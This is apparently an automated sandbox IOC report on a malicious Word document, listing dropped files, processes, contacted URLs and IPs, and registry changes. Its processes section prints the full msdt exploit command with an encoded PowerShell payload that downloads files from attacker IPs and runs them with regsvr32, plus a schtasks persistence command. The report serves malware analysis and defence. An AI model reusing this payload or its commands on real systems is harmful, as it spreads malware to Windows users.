IOC Report
doc782.docx

loading gif

Files

File Path
Type
Category
Malicious
doc782.docx
Microsoft OOXML
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\~$doc782.docx
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES
HTML document, ASCII text, with very long lines, with CRLF line terminators
downloaded
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBF3E02.RES
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA120D60.RES
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb
Microsoft Access Database
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\DD77C7D6-2AC5-4FD4-86E9-418877D1BD59
XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{677538CC-22A1-43D9-BD9A-C629280F1C4E}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{9637A4EF-9FF4-43D0-9F94-84AF1936C274}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].htm (copy)
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\RES1B1C.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\RES2969.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\RES4732.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\doc782.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:28:53 2022, mtime=Wed Jun 8 01:50:16 2022, atime=Wed Jun 8 01:50:04 2022, length=10144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
Little-endian UTF-16 Unicode text, with CR line terminators
dropped
C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.diagpkg
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\RS_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\TS_ProgramCompatibilityWizard.ps1
UTF-8 Unicode text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\VF_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\en-US\CL_LocalizationData.psd1
Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
dropped
C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\en-US\DiagPackage.dll.mui
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\result\results.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{90C60528-C98F-4BCE-9AB0-F5E79340A27B}.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{4A9BEEDA-1620-41EC-85E7-8F2F9F4B21C8}.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2921E275-B8BF-45B2-888A-BDBD2D0A4929}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{77318D9D-F0AF-4DD2-B489-88A56CEFB392}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\{99E1AFB0-685D-4B38-97F2-71EBFEEE2F14}
data
dropped
C:\Users\user\AppData\Local\Temp\{BC1313D8-3C5B-4901-A926-7D9B949D287F}
data
dropped
There are 37 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
malicious
C:\Windows\SysWOW64\msdt.exe
C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
malicious
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A
malicious
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A
malicious
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06
malicious
C:\Windows\System32\regsvr32.exe
regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A"
malicious
C:\Windows\SysWOW64\regsvr32.exe
-s "C:\Users\user\AppData\Local\Temp\t1.A"
malicious
C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2969.tmp" "c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4732.tmp" "c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B1C.tmp" "c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
There are 11 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://185.234.247.119/123.RES
185.234.247.119
malicious
http://185.2
unknown
malicious
https://api.diagnosticssdf.office.com
unknown
https://login.microsoftonline.com/
unknown
https://shell.suite.office.com:1443
unknown
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
unknown
http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types
unknown
https://autodiscover-s.outlook.com/
unknown
https://roaming.edog.
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
unknown
https://cdn.entity.
unknown
https://api.addins.omex.office.net/appinfo/query
unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey
unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
unknown
https://powerlift.acompli.net
unknown
https://rpsticket.partnerservices.getmicrosoftkey.com
unknown
https://lookup.onenote.com/lookup/geolocation/v1
unknown
https://cortana.ai
unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://cloudfiles.onenote.com/upload.aspx
unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
unknown
https://entitlement.diagnosticssdf.office.com
unknown
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
unknown
https://api.aadrm.com/
unknown
https://ofcrecsvcapi-int.azurewebsites.net/
unknown
http://schemas.xmlsoap.org/soap/http
unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
unknown
https://api.microsoftstream.com/api/
unknown
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
unknown
https://cr.office.com
unknown
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
unknown
https://portal.office.com/account/?ref=ClientMeControl
unknown
https://graph.ppe.windows.net
unknown
https://res.getmicrosoftkey.com/api/redemptionevents
unknown
https://powerlift-frontdesk.acompli.net
unknown
https://tasks.office.com
unknown
https://officeci.azurewebsites.net/api/
unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work
unknown
http://www.borland.com/namespaces/Types-IWSDLPublish
unknown
https://store.office.cn/addinstemplate
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
https://api.aadrm.com
unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=
unknown
https://globaldisco.crm.dynamics.com
unknown
https://messaging.engagement.office.com/
unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://dev0-api.acompli.net/autodetect
unknown
https://www.odwebp.svc.ms
unknown
https://api.diagnosticssdf.office.com/v2/feedback
unknown
https://api.powerbi.com/v1.0/myorg/groups
unknown
https://web.microsoftstream.com/video/
unknown
https://api.addins.store.officeppe.com/addinstemplate
unknown
http://185.234.247.119:80/123.RES
unknown
https://graph.windows.net
unknown
https://dataservice.o365filtering.com/
unknown
https://officesetup.getmicrosoftkey.com
unknown
http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublish
unknown
https://analysis.windows.net/powerbi/api
unknown
https://prod-global-autodetect.acompli.net/autodetect
unknown
https://outlook.office365.com/autodiscover/autodiscover.json
unknown
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
unknown
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
http://crl.micro
unknown
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://ncus.contentsync.
unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
unknown
http://weather.service.msn.com/data.aspx
unknown
https://apis.live.net/v5.0/
unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
unknown
http://schemas.xmlsoap.org/wsdl/mime/
unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
unknown
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
unknown
https://management.azure.com
unknown
https://outlook.office365.com
unknown
https://wus2.contentsync.
unknown
https://incidents.diagnostics.office.com
unknown
https://clients.config.office.net/user/v1.0/ios
unknown
http://www.borland.com/namespaces/TypesU
unknown
https://insertmedia.bing.office.net/odc/insertmedia
unknown
https://o365auditrealtimeingestion.manage.office.com
unknown
https://outlook.office365.com/api/v1.0/me/Activities
unknown
http://schemas.xmlsoap.org/soap/envelope/
unknown
https://api.office.net
unknown
https://incidents.diagnosticssdf.office.com
unknown
https://asgsmsproxyapi.azurewebsites.net/
unknown
https://clients.config.office.net/user/v1.0/android/policies
unknown
https://entitlement.diagnostics.office.com
unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
unknown
https://substrate.office.com/search/api/v2/init
unknown
https://outlook.office.com/
unknown
http://schemas.xmlsoap.org/wsdl/soap/
unknown
https://storage.live.com/clientlogs/uploadlocation
unknown
https://outlook.office365.com/
unknown
https://webshell.suite.office.com
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
unknown
https://substrate.office.com/search/api/v1/SearchHistory
unknown
http://www.borland.com/namespaces/Types
unknown
http://www.borland.com/namespaces/Typesp
unknown
https://management.azure.com/
unknown
http://185.234.247.119/123.RESyX
unknown
There are 92 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
185.234.247.119
unknown
Russian Federation
malicious
192.168.2.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
r~>
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
s~>
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
m!>
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
RemoteClearDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3
Last
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
FilePath
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
StartDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
EndDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Properties
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Url
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
LastClean
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableWinHttpCertAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableIsOwnerRegex
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableSessionAwareHttpClose
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALForExtendedApps
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALSetSilentAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableGuestCredProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableOstringReplace
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
u*>
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
Type
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
Protocol
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
Flags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
CobaltMajorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
CobaltMinorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
MsDavExt
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
WebUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
Type
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
Protocol
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
Flags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
CobaltMajorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
CobaltMinorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
MsDavExt
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
WebUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\32E46
32E46
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Word8.0
MSForms
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Word8.0
MSComctlLib
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries
1
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries
UpdateComplete
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033
Options Version
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 0
Name
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 0
Data
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 1
Name
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 1
Data
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\3A431
3A431
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
File Path
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Datetime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Position
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
VisiFlm
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
AutoGrammar
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
AutosaveInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
PreferredView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingConfigurableSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastSyncTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastWriteTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
Expiration
